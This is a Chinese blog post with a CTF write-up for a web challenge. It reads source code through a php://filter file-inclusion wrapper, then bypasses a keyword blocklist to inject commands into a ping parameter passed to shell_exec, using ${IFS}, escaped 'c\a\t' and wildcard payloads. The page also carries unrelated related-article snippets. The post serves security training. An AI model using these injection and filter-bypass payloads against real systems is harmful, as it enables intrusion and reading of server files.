bmzctf端午就该吃粽子

最新推荐文章于 2023-03-27 19:04:16 发布
最新推荐文章于 2023-03-27 19:04:16 发布
阅读量320 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/118738613
版权
命令执行常用到的函数
  • system() :有回显
  • passthru()
  • shell_exec()
  • `` :无回显
cat 替换
  • nl
  • more
  • tac
  • less
小技巧

​ 我们可以用 %09,${IFS}代替空格 ,当flag 被过滤时可以用 正则表达式来代替

端午就该吃粽子

回到题目 发现zhongzi参数可空 -> 文件包含漏洞

直接用伪协议php://filter/read=convert.base64-encode/resource=index.php

得到

<?php
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/(;|'| |>|]|&| |python|sh|nc|tac|rev|more|tailf|index|php|head|nl|sort|less|cat|ruby|perl|bash|rm|cp|mv|\*)/i", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no no no!')
      window.location.href='index.php';</script");
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no flag!')
      window.location.href='index.php';</script>");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo $a;
}
?url=127.0.0.1|c\a\t${IFS}/????

直接看到最后一句那里,命令执行漏洞

对应上文所讲知识: cat 被过滤可以用 c\a\t ,flag被过滤对应正则??? 空格被过滤可以用%09 或者 ${IFS} 最终pyload为

?url=127.0.0.1|c\a\t${IFS}/???

Rgylin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
粽子比赛flash端午动画
07-24
【标题】"粽子比赛flash端午动画"是一个与传统中国文化节日端午节相关的动画作品,它以生动活泼的方式展示了端午节的特色活动——粽子比赛。这个动画可能包含一系列的卡通角色,通过他们之间的互动和竞赛,让...
端午节 - 抓粽子的小游戏
06-01
这是一个端午节接粽子的小游戏,在移动端运行,微信上读取用户信息并记录游戏结果。游戏结束分数提交显示排行榜。 基于[CreateJS](http://www.createjs.com/)引擎开发。 ##Demo demo需要微信授权,请用微信扫描打开...
端午节为什么要粽子.doc
09-15
端午节为什么要粽子.doc
BMZCTF端午就该粽子
野马菲比的博客
09-14 317
访问login.php: 点击进入是一个登录框: 尝试登陆没有任何反应,查看源码; 访问index.php: 发现是空白页: 试试伪协议: PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCmlmIChpc3NldCgkX0dFVFsndXJsJ10pKSB7DQogICRpcD0kX0dFVFsndXJsJ107DQogIGlmKHByZWdfbWF0Y2goIi8oO3wnfCB8PnxdfCZ8IHxweXRob258c2h8bmN8dGFj...
BMZCTF ssrfme 端午节就该粽子 pchar???
weixin_52268949的博客
03-27 439
空格等特殊字符如果不进行编码,服务器在处理的时候可能出现问题,通过浏览器的方式访问的话,空格会自动编码为%20或者+,但我们通过上述方法嵌套参数,让服务器自己去请求http的时候就会出现问题,解决方法是进行二次编码。因为第二点说了web服务器默认就会对解析后的参数进行url解码,所以php最开始解析我们的参数时进行了一个解码,服务器通过http伪协议去访问时又会对解析后的参数进行一次解码,所以我们可以进行二次编码。|拼接执行指令\绕过对cat的匹配${IFS}绕过对空格的匹配,?并且长度不能大于70。
BMZCTF-端午彩蛋-纪念屈原
Crazy198410的博客
06-16 542
rar 下载附件,查看文件头部,是一个rar的压缩包。 改后缀解压,需要密码,看到压缩包提示:屈原的姓、氏、名、字分别为哪四个字?拼接起来md5加密后即为解压密码 查看百度:屈原(约公元前340—公元前278年),芈姓,屈氏,名平,字原, 组合芈屈平原,写脚本进行md5编码: import hashlib s1 = '芈屈平原'.encode('utf-8') x=hashlib.md5(s1).hexdigest() print(x) 得到密码:16ccb09f96f27af192f541992560
端午粽子的来历
keke20140520的专栏
05-22 457
端午节,即农历五月初五,中国民间传统节日。端午节与纪念屈原有关,传说楚国著名爱国诗人屈原怀才不遇,于公元前278年的农历五月初五怀石自沉汨罗江而死。人们知道后,纷纷赶来用糯米包成粽子投入江里喂鱼虾,希望鱼虾不屈原的躯体。从此以后,人们便在农历五月初五进行赛龙舟、粽子的活动来纪念屈原。民间在这一天还有挂昌蒲、艾叶,以及用雄黄酒驱邪等习俗。
端午粽子作文.doc
01-16
总的来说,端午粽子是中国文化中的一个重要组成部分,它不仅是一种美食,更是一种情感的寄托和历史的记忆。每一年的端午节,人们通过品尝粽子,传承着这个古老节日的精神内涵,同时也享受着这份传统带来的温馨与...
BMZCTF:2020sdnisc-懂得都懂
末初的CSDN博客
01-21 523
http://bmzclub.cn/challenges#2020sdnisc-%E6%87%82%E5%BE%97%E9%83%BD%E6%87%82 png图片就先尝试LSB,根据提示猜测密码可能是弱密码直接试123456就出来了 flag{6e9fbfe27c40bbad06db30c42c04c4d6}
ctf 粽子的来历
abtgu的博客
02-03 4676
ctf 粽子的来历 题目:曹操的私生子曹小明因为爸爸活着的时候得罪太多人,怕死后被抄家,所以把财富保存在一个谁也不知道的地方。曹小明比较喜欢屈原,于是把地点藏在他的诗中。三千年后,小明破译了这个密码,然而却因为担心世界因此掀起战争又亲手封印了这个财富并仿造当年曹小明设下四个可疑文件,找到小明喜欢的DBAPP标记,重现战国辉煌。(答案为正确值(不包括数字之间的空格)的小写32位md5值)
CTF练习题
qq_53460654的博客
12-15 4360
端午就该粽子 打开环境没有界面 直接目录扫描得到 login.php 访问得到 发现存在文件包含 试试目录跳跃,发现被过滤掉了 那就直接php为协议读源码 http://www.bmzclub.cn:22020/login.php?zhongzi=php://filter/read=convert.base64-encode/resource=index.php 解码得到 <?php error_reporting(0); if (isset($_GET['url'])) {
BMZCTF-神秘压缩包
Crazy198410的博客
06-17 1251
下载附件,里面有两个文件: wenjian.rar和压缩包密码.txt 打开压缩包密码后,发现是base64编码。前缀是data:image/png;应该是将PNG图片内容用base64编码了,写脚本还原: import base64 with open(r'C:\题目\压缩包密码.txt','r') as f : tmp=f.read() tmp = tmp.split('base64,')[1] tmp = base64.b64decode(tmp) with open (r.
“白帽寻宝记”启程!解题抽奖拿奖品 邀你一起 共度端午
Ms08067安全实验室
06-07 373
端午特别活动06.05~06.15白帽寻宝记端午来临之际,白帽子社区携多家平台精心筹办了本次“白帽寻宝记”活动,丰厚的奖品与趣味的活动,与表哥们共度端午。即刻参与抽奖:转发活动到朋友圈并截...
BMZCTF:flag就在这
末初的CSDN博客
12-13 719
http://bmzclub.cn/challenges#flag%E5%B0%B1%E5%9C%A8%E8%BF%99 flag就在这.zip 缺少zip文件头,加上 有密码,看了下全局方式位标记是真加密,尝试爆破,一般也就4-8位数字密码 6位掩码成功爆破出来密码:155466 解压得到flag flag{3a845dd9-4e8a-5b6b-38c7-a78d66e8a055} ...
FUZZ题目讲解
qq_46540840的博客
04-28 2946
FUZZ讲解 文章目录FUZZ讲解前言使用方法补充知识点构造的代码 前言 何为Fuzz简单来说就是模糊测试 模糊测试(fuzz testing)是一种介于完全的手工渗透测试与完全的自动化测试之间的安全性测试类型 就是一遍一遍的去尝试 使用方法 拿buuctf 一道注入题来说 [CISCN2019 华北赛区 Day2 Web1]Hack World 输入1,2,3 分别有不同显示内容分别是 Hello, glzjin wants a girlfriend Do you want to be my gi
Bugku web19&秋名山车神
qq_46540840的博客
02-20 1561
Bugku web18秋名山车神文章目录前言一、知识补充1.正则表达试补充2.re 函数介绍二、web 19 解题过程三 .秋名山车神总结 文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录文章目录前言一、知识补充1.正则表达试补充2.re 函数介绍二、web 19 解题过程三 .秋名山车神总结 前言 题目设计到正则表达试的运用 提示:以下
sqlguncms
qq_46540840的博客
07-14 1347
sqlguncms 我们这里以比较真实环境来说 那道网站后发现有输入框 ,而且上面有回显内容大大减少了 渗透的步骤 -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# -1' union select 1,group_concat(column_name),3 from information_schema.columns where tabl
python画出端午粽子
最新发布
06-06
在Python中,我们可以使用matplotlib和numpy等库来绘制一些基本的图形,虽然画出复杂的粽子形状可能比较困难,但我们可以尝试创建一个简单的抽象的粽子模型。以下是一个简化的例子,展示如何使用Python和matplotlib来绘制一个类似于粽子的三角形: ```python import matplotlib.pyplot as plt import numpy as np def draw_triangle(size, color='green'): vertices = [(0, 0), (size, 0), (size / 2, size * np.sqrt(3) / 2)] plt.fill(*vertices, color=color) # 创建一个新的图像 fig, ax = plt.subplots() ax.set_aspect('equal') # 保持比例 # 绘制粽子的"外壳" draw_triangle(5, 'brown') # 添加一些细节,如线条或颜色渐变 for i in range(3): draw_triangle(3, 'light{}'.format(i % 3 + 1)) # 用淡色区分不同部分 # 标题和轴标签 plt.title("抽象的端午粽子") plt.xlabel("宽度") plt.ylabel("高度") # 显示图形 plt.show() ``` 这个代码会生成一个具有简单三角形组成的粽子图像,实际上粽子的形状更复杂,需要使用更专业的图形生成库或者结合算法生成图像。如果你对如何创建更复杂的粽子图形感兴趣,可以尝试学习一下3D图形绘制或者使用专门的图形设计软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值